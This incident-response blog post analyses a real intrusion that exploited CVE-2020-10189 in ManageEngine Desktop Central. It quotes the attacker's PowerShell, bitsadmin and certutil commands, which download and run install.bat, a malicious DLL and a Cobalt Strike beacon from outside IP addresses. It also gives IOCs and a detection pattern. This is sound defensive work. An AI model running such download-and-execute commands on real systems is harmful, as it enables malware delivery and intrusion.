# Analysis Of Exploitation: CVE-2020-10189 **[blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/](https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/)** The Recon incident response team recently worked an intrusion case involving a ManageEngine Desktop Central server that was affected by CVE-2020-10189. _Zoho ManageEngine Desktop Central 10 allows remote code execution because of_ _deserialization of untrusted data in getChartImage in the FileStorage class. This is related_ _to the CewolfServlet and MDMLogUploaderServlet servlets._ [https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle](https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle) ## Remote Code Execution vulnerability disclosed on Twitter During our research of Desktop Central vulnerabilities we located a post on Twitter from a researcher who had disclosed an RCE for Desktop Central on March 5, 2020 (Figure 1). **Figure 1 - Vulnerability disclosed on Twitter** Research on CVE-2020-10189 also showed that vulnerable Desktop Central servers were searchable on [Shodan, a popular search engine for Internet-connected devices often used by](https://www.shodan.io/) attackers looking for vulnerable targets (Figure 2). ----- **Figure 2 - Vulnerable Desktop** Central servers searchable on Shodan Initial compromise was determined based on a suspicious PowerShell download cradle that contained instructions to download files from a dotted quad url. One of the earliest activities carried out by the actor are a few suspicious PowerShell download commands. The commands contained instructions to download `install.bat and` `storesyncsvc.dll to` `C:\Windows\Temp and then immediately` execute `install.bat (figure 3).` ``` cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C: $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll ``` **Figure 3 -** Suspicious PowerShell download commands The `install.bat script contained instructions to install` `storesyncsvc.dll as a service on` the system. (Figure 4). ----- **Figure** **4 - Install.bat contents** Predictably, within seconds of the suspicious PowerShell commands being run, we observed the installation of a new service with the Service Name `StorSyncSvc and Display Name` of `Storage Sync Service (Figure 5).` ----- **Figure 5 - Storage Sync** Service install OSINT quickly confirmed `storesyncsvc.dll to be previously observed by others hit by this` campaign. VirusTotal results indicated that several detection engines had already classified `storesyncsvc.dll as malware.` https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e89 25e23bbeaa1c/details ## Leveraging Process Tracking to Identify Application Exploitation Knowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to this intrusion, we already had a strong theory on the attack vector being exploitation of the Zoho ManageEngine Desktop Central application. Review of Sysmon process creation events indicated that `C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe was the process` responsible for executing the PowerShell Download commands (Figure 6). **Figure 6 -** ParentImage responsible for PowerShell download ----- Looking at processes in memory, we also observed the parent/child relationship between the Desktop Central `java.exe application,` `cmd.exe and` `2.exe (Figure 7).` **Figure** **7 -** `java.exe parent/child process relationships` ## Leveraging Filesystem Artifacts to Identify Application Exploitation To further validate our theory, we compared the artifacts that had been collected from the affected Desktop Central server to the POC that had been published and determined that the attacker had likely leveraged the CVE-2020-10189 vulnerability to run code on this vulnerable system. Through filesystem timeline analysis we determined that a traversal file write had likely occurred on the system with the file names `_chart (Figure 8) and` `logger.zip (Figure 9).` **Figure 8 - File** system analysis `_chart` ----- system analysis `logger.zip` These file names were also referenced in the POC that had been released by [@Steventseeley (Figure 10).](https://twitter.com/steventseeley) **Figure 9 - File** Figure 10 - POC references to `_chart and` `logger.zip, reference:` https://srcincite.io/pocs/src-20200011.py.txt ## Command and Control Payload Introduced To System ----- Subsequent process creation logs revealed `cmd.exe and` `certutil.exe commands being` used to download and execute `2.exe (Figure 11). Further analysis revealed a high likelihood of` ``` 2.exe being part of the popular post-exploitation and C2 tool Cobalt Strike. cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe ``` **Figure 11 -** Certutil commands OSINT revealed that `2.exe was already identified as malware by several detection engines on` VirusTotal: https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a 71d2e26242cd9a80e67309/details Leveraging app.any.run sandbox (Figure 12) and memory analysis of the malware further confirmed the likelihood of `2.exe being a hosted Cobalt Strike Beacon payload.` **Figure** **12 -** `2.exe classified as Cobalt Strike Beacon` https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67 309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6 ### YARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE We performed a yara scan against all memory sections in use by the known malware, `2.exe .` The yara scan results further supported the theory of `2.exe resembling a Cobalt Strike beacon` among several other possible malware signature hits (Figure 13). ----- **Figure 13 - Yarascan results** Leveraging Volatility’s malfind plugin, we identified several memory sections with potential signs of code injection. We fired off another yara scan, this time against the memory sections dumped by malfind. This provided additional validation of the likely presence of a Cobalt Strike Beacon. See that entire process in the asciinema recording below (Figure 14). Figure 14 - Yarascan against malfind output We then examined malfind’s output for evidence of code injection and identified suspicious memory sections within `svchost.exe (Figure 15). OSINT research led us to a researcher that` had reversed the malware and found the area responsible for injecting code into `svchost.exe (Figure 16).` **Figure** **15 - Our analysis of svchost containing injected code** ----- **Figure** **16 - @VK_Intel’s analysis showing likely inject function** Reference: Among the post-compromise activities, we observed malicious Bitsadmin commands that contained instructions to transfer `install.bat from` `66.42.96.220 over suspicious` port `12345 .` Our analysts observed bitsadmin commands being run on the Desktop Central server which contained the same IP address, port and the same install.bat file called in the PowerShell download commands (Figure 17). ``` cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat ``` **Figure** **17 - Bitsadmin commands** ## Credential Access We also observed potential credential access activity. A common technique for attackers to perform credential dumping is using a malicious process (SourceImage) to access another process (the TargetImage). Most commonly, `lsass.exe is targeted as it often contains sensitive` information such as account credentials. Here, we observed the SourceImage `2.exe accessing the TargetImage` `lsass.exe (Figure` 18). The Cobalt Strike Beacon contains native credential dumping capabilities similar to [Mimikatz. The only required condition to use this capability is SYSTEM privileges, which the](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa) ----- attacker had. The event below provides sufficient evidence that the risk of credential access is high. **Figure 18** - `2.exe accessing` `lsass.exe` ## Tools For IR Teams Dealing With Similar Intrusions During our analysis of this intrusion, we added a few collection targets to Eric Zimmerman's [KAPE tool to add the](https://learn.duffandphelps.com/kape) [relevant logs to triage efforts.](https://github.com/EricZimmerman/KapeFiles/commit/c5ca95acd929bc3c6ab613e3e43d52504a478f03) [Read more about KAPE.](https://binaryforay.blogspot.com/2019/02/introducing-kape.html) Example usage targeting relevant logs (tune for your use-case): ``` kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs ``` ## IOCs ``` Storesyncsvc.dll ``` MD5: `5909983db4d9023e4098e56361c96a6f` SHA256: `f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c` ``` Install.bat ``` MD5: `7966c2c546b71e800397a67f942858d0` SHA256: `de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc` ``` 2.exe ``` MD5: `3e856162c36b532925c8226b4ed3481c` SHA256: `d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309` ``` 66[.]42[.]98[.]220 91[.]208[.]184[.]78 74[.]82[.]201[.]8 ## Detection ``` Florian Roth of the Sigma project has created a signature to detect some of the techniques leveraged by the attackers: https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_ 2020_10189.yml ----- Our analysis of this attack also found that detection based on command-line activity in process creation logs would be valuable. ``` ParentImage | endswith: 'DesktopCentral_Server\jre\bin\java.exe' CommandLine | contains: '*powershell*' '*certutil*' '*bitsadmin*' ``` **[UPDATE]** The researchers at Fireeye published an excellent article that contained some of the same findings and included attribution to APT41. You can read more about it here: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaignusing-multiple-exploits.html Tags: [DFIR,](https://blog.reconinfosec.com/topic/dfir) [Incident Response,](https://blog.reconinfosec.com/topic/incident-response) [Forensics,](https://blog.reconinfosec.com/topic/forensics) [SecOps,](https://blog.reconinfosec.com/topic/secops) [InfoSec,](https://blog.reconinfosec.com/topic/infosec) [Defense,](https://blog.reconinfosec.com/topic/defense) [Malware,](https://blog.reconinfosec.com/topic/malware) [Exploit,](https://blog.reconinfosec.com/topic/exploit) CVE2020-10189, [Intel Sharing,](https://blog.reconinfosec.com/topic/intel-sharing) [Zoho,](https://blog.reconinfosec.com/topic/zoho) [Vulnerability,](https://blog.reconinfosec.com/topic/vulnerability) [ManageEngine](https://blog.reconinfosec.com/topic/manageengine) **Written by** **[Luke Rusten](https://blog.reconinfosec.com/author/luke-rusten)** Security Operations Manager -----